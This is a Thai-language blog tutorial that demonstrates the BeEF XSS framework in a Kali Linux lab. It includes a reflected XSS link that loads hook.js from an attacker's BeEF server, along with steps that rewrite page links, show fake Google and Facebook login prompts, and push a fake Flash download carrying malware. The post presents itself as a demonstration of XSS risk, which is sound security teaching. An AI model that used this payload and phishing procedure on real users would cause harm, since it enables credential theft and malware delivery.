วิธีใช้งาน Kali Linux – BeEF – XSS Framework

จาก วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan ได้แสดงให้เห็นว่า เมื่อตรวจเจอช่องโหว่ Cross Site Scripting (XSS) บนเครื่องเป้าหมาย

2559-10-17-11_11_17-program-manager

จากที่ได้เคยบรรยายไปใน Web Hacking and Security Workshop เรื่อง วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 : วิธีการ Hack ด้วย SQL Injection และ Cross-Site Scripting ซึ่งแสดงให้เห็นว่า หากมีช่องโหว่ดังกล่าว ทำให้สามารถใส่ JavaScript ลงไปได้

2559-10-24-10_46_51-desktop-running-oracle-vm-virtualbox

2559-10-24-10_47_34-program-manager

ซึ่งอาจจะดูไม่น่าจะอันตรายอะไร แต่ ถ้า Hacker พบช่องโหว่ XSS (reflected) นี้บน Website ของเรา แล้วส่ง URL ที่แนบ JavaScript ไปหลอกผู้ใช้ของเรา อาจจะเป็นทาง Email ก็จะเป็นปัญหาได้

ต่อไปนี้ จะแนะนำอีกเครื่องมือหนึ่ง ที่ชื่อว่า BeEF XSS Framework ใน Kali Linux ดังวิธีการใช้งาน “เบื้องต้น” ให้เห็นอันตรายของช่องโหว่นี้ ดังนี้

  1. เปิด Application > 08 Exploitation Tools > beef xss framework
    2559-10-24-11_31_21-kali-light-running-oracle-vm-virtualbox
  2. เมื่อระบบทำงานแล้ว ให้ copy Example Hook ไว้ก่อน แล้วมา Login BeEF Website โดยใส่ username/password เป็น beef/beef
    2559-10-24-11_34_53-program-manager
  3. ต่อไป อาจจะส่ง email ไปหลอกผู้ใช้ของระบบ โดยใส่ Link เป็น
    http://192.168.56.101/xss/simple.php?name=<script src=”http://192.168.56.102:3000/hook.js”></script>
    โดยในที่นี้
    192.168.56.101 เป็น Website ที่มีช่องโหว่ XSS
    192.168.56.102 เป็น BeEF Server ของ Hacker ที่เปิด port 3000 รอให้ Download hook.js ไปติดตั้ง
    หากผู้ใช้โดนหลอกให้คลิก จะปรากฏภาพดังนี้
    2559-10-24-11_38_13-desktop-running-oracle-vm-virtualbox
  4. เมื่อมีผู้ใช้โดนหลอกให้คลิกเรียบร้อย ทาง Hacker ที่ใช้ BeEF จะเห็นหน้าจอดังนี้
    2559-10-24-11_42_22-program-manager
  5. BeEF สามารถรู้รายละเอียดของ Browser ของเป้าหมายได้
    2559-10-24-11_43_50-program-manager
  6. ในเมนู Command สามารถทำอะไรได้หลายอย่าง
    2559-10-24-11_45_09-start
  7. เมื่อเลือก Browser > Hooked Domain > Get Page HREFs2559-10-24-11_46_37-kali-light-running-oracle-vm-virtualbox
    แล้วคลิก Execute จากนั้น มาดูผลงานใน Command results ก็จะเห็นว่า ใน Page ของผู้ใช้ มี Link เดิมเป็น http://xssattackexamples.com เป็นต้น
    2559-10-24-11_47_05-kali-light-running-oracle-vm-virtualbox

    จากนั้น เลือก Replace HREFs เป็น http://beefproject.com/ แล้วคลิก Execute
    2559-10-24-11_47_31-program-manager

    ตรวจสอบผลงาน พบว่า Link ถูกเปลี่ยนไป 2 ตำแหน่ง
    2559-10-24-11_47_50-kali-light-running-oracle-vm-virtualbox
    ผู้ใช้จะเห็น Link เปลี่ยนไปดังภาพ
    2559-10-24-11_48_18-desktop-running-oracle-vm-virtualbox
  8. สั่งให้ Pop Dialog ถามรหัสผ่านผู้ใช้ (แบบบ้านๆ)
    2559-10-24-11_56_42-program-manager 2559-10-24-11_56_58-program-manager
  9. สั่งให้หลอกถาม username/password ของ Google
    2559-10-24-12_00_14-kali-light-running-oracle-vm-virtualbox 2559-10-24-12_00_38-program-manager
  10. สั่งให้หลอกถามแบบ Facebook
    2559-10-24-12_04_35-program-manager 2559-10-24-12_05_00-desktop-running-oracle-vm-virtualbox
  11. และหลอกให้ download Flash Player แต่จริงๆแล้วเป็น Virus/Malware/Ransomware
    2559-10-24-12_02_18-kali-light-running-oracle-vm-virtualbox 2559-10-24-12_04_11-desktop-running-oracle-vm-virtualbox

 

 

Leave a Reply